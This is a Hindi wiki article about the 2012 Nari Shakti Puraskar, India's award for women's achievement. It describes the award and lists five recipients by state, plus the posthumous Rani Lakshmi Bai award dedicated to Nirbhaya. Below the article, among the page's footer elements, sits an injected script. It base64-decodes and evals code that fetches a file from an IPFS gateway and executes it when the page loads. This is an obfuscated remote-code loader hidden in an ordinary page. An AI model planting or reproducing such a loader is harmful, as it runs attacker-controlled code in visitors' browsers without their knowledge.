नारी शक्ति पुरस्कार, 2012  

नारी शक्ति पुरस्कार विभिन्न क्षेत्रों में महिलाओं के असाधारण योगदान और उपलब्धि को पहचानने के लिए भारत सरकार द्वारा प्रदान किया जाने वाला एक वार्षिक पुरस्कार है। वर्ष 2014 से पहले तक इस पुरस्कार को 'स्त्री शक्ति पुरस्कार' के नाम से जाना जाता था। यह पुरस्कार उन महिलाओं के लिए मान्यता का प्रतीक बन गया है, जिन्होंने अपने चुने हुए क्षेत्र में उत्कृष्टता हासिल करने के लिए सामाजिक और आर्थिक बाधाओं को पार किया है। यह पुरस्कार विज्ञान, सामाजिक कार्य, शिक्षा, खेल और कला जैसे विविध क्षेत्रों की महिलाओं को प्रदान किया जाता रहा है।

नारी शक्ति पुरस्कार के विजेता भारत में उन लाखों महिलाओं के लिए प्रेरणा का काम करते हैं जो अपने सपनों को हासिल करने और समाज में योगदान देने के लिए प्रयासरत हैं। पुरस्कार समारोह हर साल 8 मार्च को अंतर्राष्ट्रीय महिला दिवस पर आयोजित किया जाता है और विजेताओं को भारत के राष्ट्रपति द्वारा सम्मानित किया जाता है। 2012 का नारी शक्ति पुरस्कार 05 महिलाओं को प्रदान किया गया। इसके अलावा, रानी लक्ष्मी बाई पुरस्कार मरणोपरांत "निर्भया के साहस" को समर्पित किया गया था।

नारी शक्ति पुरस्कार
क्रम पुरस्कार प्राप्तकर्ता राज्य वर्ष छवि
1. कन्नगी देवी पुरस्कार गुरम्मा एच. संकिना कर्नाटक 2012
2. माता जीजाबाई पुरस्कार सोनिका अग्रवाल दिल्ली 2012
3. देवी अहिल्याबाई होल्कर पुरस्कार ओल्गा डिमेलो महाराष्ट्र 2012
4. रानी गाइदिनल्यू जेलियांग पुरस्कार ओमाना टीके केरल 2012
5. रानी रुद्रमा देवी पुरस्कार प्रणिता तालुकदार असम 2012


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=नारी_शक्ति_पुरस्कार,_2012&oldid=683486" से लिया गया